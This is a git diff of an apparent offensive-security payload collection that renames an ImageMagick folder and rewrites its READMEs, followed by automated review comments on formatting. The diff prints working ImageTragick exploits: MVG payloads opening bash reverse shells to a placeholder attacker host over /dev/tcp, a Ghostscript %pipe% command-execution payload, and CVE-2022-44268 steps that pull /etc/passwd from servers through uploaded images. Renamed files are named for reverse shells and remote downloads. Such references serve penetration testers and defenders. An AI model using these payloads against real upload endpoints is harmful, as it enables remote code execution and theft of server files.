diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 662f63d..704e89e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -4430,4 +4430,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) * [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) * [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) -* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) \ No newline at end of file +* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) +* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html) \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/README.md b/Upload Insecure Files/Picture Image Magik/README.md deleted file mode 100644 index 98e51af..0000000 --- a/Upload Insecure Files/Picture Image Magik/README.md +++ /dev/null 
@@ -1,38 +0,0 @@ -# Image Tragik 1 & 2 - - -## Exploit v1 - -Simple reverse shell - -```powershell -push graphic-context -encoding "UTF-8" -viewbox 0 0 1 1 -affine 1 0 0 1 0 0 -push graphic-context -image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' -pop graphic-context -pop graphic-context -``` - -## Exploit v2 - -Simple `id` payload - -```powershell -%!PS -userdict /setpagedevice undef -save -legal -{ null restore } stopped { pop } if -{ legal } stopped { pop } if -restore -mark /OutputFile (%pipe%id) currentdevice putdeviceprops -``` - -then use `convert shellexec.jpeg whatever.gif` - -## Thanks to - -* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) \ No newline at end of file diff --git a/Upload Insecure Files/Picture ImageMagick/README.md b/Upload Insecure Files/Picture ImageMagick/README.md new file mode 100644 index 0000000..d55d97d --- /dev/null +++ b/Upload Insecure Files/Picture ImageMagick/README.md 
@@ -0,0 +1,52 @@ +# ImageMagick Exploits + +## ImageTragik Exploit v1 + +Simple reverse shell + +```powershell +push graphic-context +encoding "UTF-8" +viewbox 0 0 1 1 +affine 1 0 0 1 0 0 +push graphic-context +image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' +pop graphic-context +pop graphic-context +``` + +## ImageTragik Exploit v2 + +Simple `id` payload + +```powershell +%!PS +userdict /setpagedevice undef +save +legal +{ null restore } stopped { pop } if +{ legal } stopped { pop } if +restore +mark /OutputFile (%pipe%id) currentdevice putdeviceprops +``` + +then use `convert shellexec.jpeg whatever.gif` + + +## CVE-2022-44268 + +Information Disclosure: embedded the content of an arbitrary remote file + +* Generate the payload + ```ps1 + apt-get install pngcrush imagemagick exiftool exiv2 -y + pngcrush -text a "profile" "/etc/passwd" exploit.png + ``` +* Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png` +* Download the converted picture and inspect its content with: `identify -verbose pngconverted.png` +* Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'` + + +## Thanks to + +* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) \ No newline at end of file diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg b/Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd.svg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg rename to Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd.svg 
diff --git a/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg b/Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd_html.svg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg rename to Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd_html.svg diff --git a/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg b/Upload Insecure Files/Picture ImageMagick/ghostscript_rce_curl.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg rename to Upload Insecure Files/Picture ImageMagick/ghostscript_rce_curl.jpg diff --git a/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png b/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png new file mode 100644 index 0000000..18c9ddf Binary files /dev/null and b/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png differ diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf b/Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd_exec.pdf similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf rename to Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd_exec.pdf diff --git a/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg b/Upload Insecure Files/Picture ImageMagick/imagemagik_ghostscript_reverse_shell.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg rename to Upload Insecure Files/Picture ImageMagick/imagemagik_ghostscript_reverse_shell.jpg 
diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png 
diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_wget.gif similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_wget.gif diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_curl.png similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_curl.png diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_portscan.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_portscan.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_remote_connection.mvg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_remote_connection.mvg 
diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_touch.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_touch.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml b/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml rename to Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml 
diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_burpcollaborator_passwd.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_burpcollaborator_passwd.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_centos_id.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_centos_id.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_id.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_id.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell.jpg diff --git a/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg b/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell2.jpg similarity index 100% rename from Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg rename to Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell2.jpg diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 4813fb0..5488276 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md 
@@ -11,7 +11,7 @@ * [Filename vulnerabilities](#filename-vulnerabilities) * [Picture compression](#picture-compression-) * [Configuration Files](#configuration-files) - * [CVE - Image Tragik](#cve---image-tragik) + * [CVE - ImageMagick](#cve---imagemagick) * [CVE - FFMpeg](#cve---ffmpeg) * [ZIP Archive](#zip-archive) * [Jetty RCE](#jetty-rce) @@ -161,18 +161,19 @@ Alternatively you may be able to upload a JSON file with a custom scripts, try t } ``` -### CVE - Image Tragik +### CVE - ImageMagick -Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1) +If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik. -```powershell -push graphic-context -viewbox 0 0 640 480 -fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' -pop graphic-context -``` +* ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1) + ```powershell + push graphic-context + viewbox 0 0 640 480 + fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' + pop graphic-context + ``` -More payload in the folder `Picture Image Magik` +More payloads in the folder `Picture ImageMagick` ### CVE - FFMpeg
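Review bot: in the `Active Directory Attack.md` hunk the added `* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](...)` entry is still followed by `\ No newline at end of file`; terminate the new last line with a newline so the next reference appended to this list does not show up as a spurious two-line change. The entry itself follows the file's existing `* [Title - Date - Author](url)` convention, so no other change is needed.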
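Review bot: in the new `Upload Insecure Files/Picture ImageMagick/README.md` the fence language tags do not match their contents: the ImageTragik v1 payload (`push graphic-context` ... `pop graphic-context`) is MVG and the v2 payload (`%!PS` ... `putdeviceprops`) is PostScript, yet both fences are tagged `powershell`, and the CVE-2022-44268 fence holds `apt-get` and `pngcrush` shell commands but is tagged `ps1`; retag them (plain text or `mvg`/`postscript` for the payloads, `bash` for the commands) so highlighters and copy-as-script tooling treat them correctly. Two documentation points in the CVE-2022-44268 section: the one-line description "Information Disclosure: embedded the content of an arbitrary remote file" is misleading, since the file read is local to the server running `convert` (`/etc/passwd` in the example), so "embeds the content of an arbitrary file from the server into the converted image" says what actually happens; and step 1 names the input `exploit.png` while step 2 converts `pngout.png`, which is pngcrush's default output name when no output file is given, so either state that explicitly or pass an output name in step 1 so the two steps visibly line up. Finally, the ImageTragik v1 section in the parent README records the affected version (`7.0.1-1`) and the "Thanks to" list credits its source, but CVE-2022-44268 gets neither an advisory link nor an affected/fixed version range; adding both lets a reader (or a defender checking their own ImageMagick build) tell whether a given version is exposed.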
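Review bot: in the second `Upload Insecure Files/README.md` hunk (`@@ -161,18 +161,19 @@`) the retained text `(ImageMagick , 7.0.1-1)` has a stray space before the comma and would read better as `(ImageMagick 7.0.1-1)`, and the nested fence is still tagged `powershell` although the payload is MVG (`push graphic-context` / `fill 'url(...)'` / `pop graphic-context`); since this hunk is already rewrapping the example into a list item, fix both while touching it. The first hunk's TOC entry `[CVE - ImageMagick](#cve---imagemagick)` matches the renamed `### CVE - ImageMagick` heading's generated anchor, so the in-page link stays valid.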